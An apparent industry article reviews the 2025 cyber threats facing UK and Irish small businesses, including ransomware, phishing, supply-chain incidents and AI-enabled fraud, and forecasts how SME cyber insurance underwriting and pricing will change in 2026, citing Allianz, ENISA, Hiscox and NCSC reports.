Across the UK and Ireland, small and medium-sized enterprises (SMEs) have spent 2025 navigating an increasingly volatile cyber threat landscape. The realities of modern cyber risk involving ransomware outages, supply chain failures, data theft and AI-enabled fraud have moved far beyond theoretical risk registers. For many SMEs, cyber incidents have had measurable, sometimes severe, financial, operational, and legal impacts.
Simultaneously, the cyber insurance market serving SMEs has undergone meaningful change. Insurers have tightened underwriting requirements, expanded expectations around controls, adapted to emerging AI-driven threats, and increasingly shaped the resilience behaviours of insured organisations. Recent data from The Association of British Insurers revealed, that nearly 200 million was paid in cyber claims to recover from cyber incidents in 2024, which showed a 230% increase year on year illustrating the growing demand for this type of policy.
In this article, we reflect on how SMEs have been impacted this year and what these developments mean for insurers, legal advisers and business leaders.
1. The cyber threat landscape for SMEs in 2025
1.1 Ransomware and data exfiltration dominate SME losses
Ransomware continued to be the single most consequential threat for SMEs across 2025. Allianz reports that ransomware accounted for around 60% of the value of large cyber claims in 1H 2025, with attackers increasingly focusing on mid-sized and less well-protected firms as large enterprises hardened their defences.1
A critical shift this year has been attackers’ reliance on data exfiltration, now easier and faster than encryption. Allianz notes that 40% of all high-value claims in 1H 2025 involved data theft, up from 25% the previous year.
For small businesses handling sensitive customer, employee or financial information particularly in professional services, legal, retail and hospitality sectors, this has meant elevated regulatory and legal exposure. This has been underlined in the recent Hiscox report, drawing attention to the fact that 33% of compromised businesses reported a regulatory fine following a data breach substantial enough to impact business health.3
Small business owners need to be aware that the consequences of a cyber incident are no longer limited to incident response costs but now involve compliance failures, regulatory scrutiny, and customer litigation. Cybercrime now represent real balance-sheet risks to all organisations, irrespective of size or turnover.
1.2 Phishing, social engineering and credential theft as primary entry points
ENISA’s analysis confirms that phishing remains the single largest initial intrusion vector, accounting for 60% of analysed cases from mid-2024 to mid-2025.2 Identity-based attacks are now the dominant mode of cyber intrusion. As Allianz notes, 80% of attacks in the past year were malware-free, relying instead on compromised credentials, impersonation, and social engineering to gain initial access, showing a dramatic increase from 40% in 2019.1
For many small businesses, where security budgets are often limited and staff turnover can be high, this shift represents a disproportionate risk: people remain the easiest entry point.
Importantly, phishing attacks have evolved significantly making it more challenging to identify. 2025 has showcased many new techniques used by bad actors including:
- “ClickFix-style” scams where users are tricked into executing PowerShell commands via fake CAPTCHA overlays.
- “Quishing” (QR-code phishing) is increasingly used to bypass email filtering.
- “Phishing-as-a-Service” platforms allowing low-skill actors to deploy credible brand-spoofing kits at scale.
- Mobile-delivered phishing campaigns, facilitated by attacks via iMessage, RCS and messaging apps.
1.3 SME exposure through supply chain and digital dependencies
Cyber risk within the supply chain has escalated sharply. Allianz reports a rise in contingent business interruption (CBI) claims, which accounted for 15% of major cyber claim value in 2025, up from 6% in 2024.1 Supply chain attacks demonstrate how third-party failures can quickly become operational, regulatory and reputational issues for all involved. ENISA has a number of examples that illustrate the risk vividly. They show how supplier-led cyber incidents can have immediate consequences for organisations that are not the original target. Breaches at IT service providers disrupted ticketing systems for transport operators in Italy, while the compromise of a technology provider exposed customer data belonging to the Spanish energy firm Repsol.2
ENISA also highlights a growing pattern of attacks exploiting outdated or compromised open-source libraries, browser extensions and SaaS applications. These technologies are deeply embedded across modern business systems but often sit outside the direct control or visibility of SMEs, leaving organisations exposed to inherited supply-chain risk.²
For SMEs increasingly reliant on managed services, cloud platforms, and third-party software, the traditional perimeter has dissolved. Risk now extends across every digital dependency, many of which SMEs lack visibility or governance over.
1.4 The impact of AI-Enabled threats
By 2025, generative AI had moved decisively from novelty to norm. What began as experimentation in chatbots and content tools quickly became embedded across everyday business operations from drafting emails and analysing data to automating customer support and supporting decision-making. Industry research shows that a majority of organisations now use generative AI in at least one core function, driven by rapid productivity gains, falling barriers to entry, and widespread integration into familiar platforms such as office suites and cloud services. This behaviour has also been replicated within the cybercrime world.
Hiscox identifies AI-driven phishing, AI malware and AI-powered social engineering as the top emerging threats SMEs expect over the next five years, with 60% expressing concern about their ability to identify AI-generated attacks.3 80% of observed social engineering globally uses AI to enhance believability, scale and personalisation with generative AI is increasingly used to automate phishing, deepfake voice calls (vishing), and reconnaissance.2
The NCSC warns that attackers are leveraging AI to, “accelerate vulnerability discovery, tailor messaging at individual employees, distribute convincing deepfake impersonations, and script malware variations that evade detection”.4
AI is not merely amplifying attacks - it is democratising them.
2. How SMEs have responded: Progress and persistent gaps
2.1 Investment and improvements in cyber maturity
Despite the severity of attacks, SMEs have shown notable improvements in cyber readiness. This has been largely driven by national schemes including the NCSC Cyber Essential schemes. According to Hiscox, 88% of small business owners perform supplier risk assessments with 91% conducting quarterly vulnerability checks. 3 83% of SMEs report improved cyber resilience compared to the previous year with 94% of SMEs plan to increase cybersecurity investment.3
This improvement can be easily tracked within the insurance sector. Allianz also notes that insured firms have become significantly more resilient than uninsured ones, with insurance-driven controls contributing to a 70% lower increase in cyber loss impact compared to the wider economy’s 250% rise in cybercrime cost over the same period.1
2.2 Weak points remain: People and process
The NCSC emphasises that too many businesses still regard cyber as an IT problem rather than a governance issue, despite its clear financial and legal implications.4
Many small businesses still lack some of the basic security controls including, MFA enforcement, segmented networks and tested backups. Staff remain the primary vulnerability, exploited in 60% of breaches (Verizon, cited by Allianz)1. Despite repeated calls from security experts for businesses to apply a ‘cyber resilience’ with a focus on the ability top respond and recovery from cyber-attack, many businesses still lack incident response and business continuity plans.
Even businesses with good controls struggle with response coordination. The Co-op CEO’s open letter in the NCSC Review following their high profile 2025 attack highlights the profound operational strain of incident management, regardless of preparation - a lesson especially relevant for SME leaders with limited internal resources.4
3. How the cyber insurance market for SMEs has changed in 2025
3.1 Tougher underwriting and rising expectations
In 2025, SME cyber insurance in the UK and Ireland has shifted from “nice to have” to a more tightly underwritten risk-transfer product: insurers are paying more claims, but they’re also asking harder questions. The need for cyber risk transfer is accelerating board-level attention regarding cyber insurance and renewal scrutiny for SMEs (especially around ransomware and business interruption). Within cyber insurance, underwriting increasingly hinges on demonstrable controls (e.g., MFA, backups, incident response), while claim drivers like BEC/social engineering remain prominent.5
This is also reflected in the Allianz report which documents that basic controls such as MFA, network segmentation, and patching could have prevented over 80% of large claims in 2025, directly influencing underwriting expectations for SMEs seeking coverage.1
Despite the overall cyber insurance market softening, 2025 has shown that insurers are increasingly unwilling to cover firms that cannot evidence minimum hygiene.
3.2 The impact of non-attack losses on the market
A notable 2025 trend has been the rise of non-attack incidents following on from 2024 were 28% of large cyber claims were driven not by attacks but by privacy litigation, technical outages, and regulatory actions.
2025 saw the first appearance of major claims linked to technology failure, including a globally impactful cloud outage caused by CrowdStrike.1 Similar instances were caused by downtime as a result of Cloudflare issues although claims from this are yet to be realised.6 For insurers, this broadens the loss profile well beyond ransomware, requiring revised pricing models and potentially reshaped cover.
3.3 Regulatory pressure and mandatory disclosure discussions
While payment following ransomware attacks has traditionally been frowned up[on by security professionals and law enforcement, in specific circumstances, compromised business owners are faced with very little alternatives to recover their business and data. Historical, the capacity to address ransomware payments have been a feature within some cyber insurance policies. However, there has been a noted changes within the sector. Hiscox has reported that 71% of SMEs globally support mandatory disclosure of ransomware payments, signalling a change in the regulatory landscape.
In some instances, governments are now enforcing mandatory reporting including within Australia, following the introduction of the Cyber Security Act 2024.3
Within Europe, the GDPR enforcement trajectory continues to shape insurer exposure. Rising privacy litigation and fines, which accounted for 18% of major claim value in 2024, have directly influenced underwriting, pricing, and coverage limits.1 Insurers increasingly expect SMEs to demonstrate compliance maturity through evidence, not self-assessment. This is one area where we expect to see significant changes in risk disclosure in the coming years.
4. The Road Ahead for SMEs: Forecast for cyber insurance in 2026
The SME cyber insurance market will continue to develop in response to the behaviour of cyber criminals as we progress through 2026. In particular, we predict:
4.1. Cyber insurance pricing will become behaviour-based, not size-based
By 2026, SME cyber insurance premiums will be driven far more by demonstrated cyber behaviours than by turnover, headcount or sector alone. Insurers have learned in 2024–2025 that basic controls matter more than firm size.
What this means:
Two SMEs of the same size will face materially different premiums, excesses and coverage terms based on how well they manage cyber risk in practice, not how they describe it at proposal stage.
4.2 “Insurability gaps” will emerge for poorly governed SMEs
While the overall cyber insurance market may continue to soften, 2026 will expose a growing coverage gap for SMEs that fail to meet minimum cyber hygiene standards. Insurers are already signalling reluctance to cover firms unable to evidence controls, and this trend will harden.
Regulators and threat analysts including NCSC have repeatedly stressed that cyber risk is a governance issue, not an IT problem. Insurers will align with this view by declining cover, applying exclusions, or imposing punitive excesses where cyber oversight remains informal or undocumented.
What this means:
Cyber insurance will no longer function as a safety net for weak controls. For some SMEs, the risk will shift from “high premium” to “no viable cover available.”
4.3 Regulatory exposure will become a primary claims driver
During 2026, regulatory and legal consequences will rival ransomware as the dominant loss driver for SME cyber insurance. GDPR enforcement, privacy litigation and mandatory disclosure regimes are already reshaping claims profiles. European regulators will continue to expect proof of compliance maturity, not self-attestation.
What this means:
Cyber insurance will increasingly overlap with legal risk management. Where SMEs do not have documented data governance, supplier oversight and incident response arrangements, insurers are more likely to apply higher excesses and restrict the scope of cover.
4.4 Supply-chain risk will be explicitly priced into SME policies
2026 will see insurers formally pricing contingent business interruption (CBI) and third-party dependency into SME cyber policies. The sharp rise in claims linked to MSP outages, SaaS failures and cloud incidents has demonstrated that SMEs inherit risk they cannot directly control.
Insurers will respond by:
- Requiring visibility of critical suppliers
- Applying sub-limits to third-party outages
- Expecting contractual risk transfer and vendor due diligence
What this means:
SMEs relying heavily on managed services, cloud platforms or single-vendor stacks will need to demonstrate resilience planning beyond their own perimeter or face coverage constraints.
4.5 Continuous cyber risk monitoring will replace annual insurance questionnaires
Static proposal forms are no longer compatible with a threat landscape shaped by AI-enabled attacks, credential compromise and rapid environmental change. By the end of 2026, cyber insurers will increasingly rely on continuous or near-real-time risk signals to assess SME exposure. Insurers need fresher data to manage accumulation risk, particularly as AI lowers the barrier to attack.
What this means:
SMEs should expect cyber insurance to feel less like an annual purchase and more like an ongoing risk relationship, where posture, not promises, determines cover quality.
5. Conclusion
2025 has marked a turning point. Cyber threats against SMEs have become more pervasive, more sophisticated, and more deeply entangled with supply chain and regulatory realities. But SMEs have also demonstrated resilience: increased investment, improved controls, and greater engagement with cyber insurance. As business owners, it’s important to remember that cyber resilience is a shared responsibility requiring active leadership, continuous investment, and coordinated response capability.
The organisations that thrive will be those that treat cyber risk not merely as a compliance function but as a core component of strategic, operational and economic resilience. Those that survive will have the safety net of an adequate cyber insurance policy in their arsenal.
6. Sources
- Allianz Commercial, Cyber Security Resilience 2025, Claims & Risk Management Trends, commercial.allianz.com
- ENISA, ENISA Threat Landscape 2025, October 2025, enisa.europa.eu
- Hiscox, Cyber Readiness Report 2025, September 2025, hiscoxgroup.com
- NCSC, National Cyber Security Centre Annual Review 2025, October 2025, ncsc.gov.uk/cybergovernance-for-boards
- Travelers, Q2 2025 Cyber Incident Report, September 2025, https://www.travelers.ie/insights/cyber/q2-2025-cyber-threat-report
- Cloudflare, November 2025, https://blog.cloudflare.com/18-november-2025-outage/
